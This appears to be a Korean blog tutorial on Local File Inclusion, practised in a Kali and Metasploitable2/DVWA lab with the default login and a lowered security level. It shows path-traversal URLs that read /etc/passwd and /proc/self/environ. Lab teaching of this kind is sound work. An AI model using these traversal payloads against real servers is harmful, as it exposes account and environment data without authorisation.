LFI 란 ?


웹 브라우저의 URL을 이용해 공격 대상 서버에 파일을 포함시키는 과정의 공격입니다 



실습을 하기 위해 칼리(kali)와 메타스플로잇터블(metasploitable2)을 실행시켜줍니다



Kali

firefox https://meta &  ( 메타스플로잇터블 아이피를 입력하셔도 됨 )



http://meta/index.php

인터넷 창이 열리면 DVWA 를 눌러 접속해 줍니다



로그인 페이지

ID  : admin

PW : password



보안레벨 낮추기



보안 레벨을 낮춰 웹페이지를 취약하게(LFI 취약점이 있는 코드) 만들어 연습을 해보겠습니다



File Inclusion



주소창에 일부러 오류를 내어 서버내에 있는 include.php파일의 경로를 확인할 수 있으며,

View Source 를 통해 웹페이지의 보안이 어떤식으로 짜여져 있는지 확인 할 수 있습니다



http://meta/dvwa/vulnerabilities/fi/?page=include.phphi


/var/www/dvwa/vulnerabilities/fi/index.php

위의 위치는 해당 서버 index.php 의 경로를 최상위 경로부터 절대경로로 나타낸 것 입니다


여기서 문자들을 상위로 이동하는 명령어인 .. 을 붙여 최상위인 루트로 이동 후

/etc/passwd 사용자 계정정보에 접속해보겠습니다



http://meta/dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd



http://meta/dvwa/vulnerabilities/fi/?page=/../../../../../proc/self/environ


프로세스에 영향을 미치는 환경 변수들의 이름과 값을 확인할 수 있습니다



proxy를 사용하여 주소를 탈취하여 수정해보기

https://leah.kr/84


블로그 이미지

보람줄

it관련 포스팅이긴 하지만 미흡한 부분이 많으므로 이해해주시고 피드백 부탁드립니다~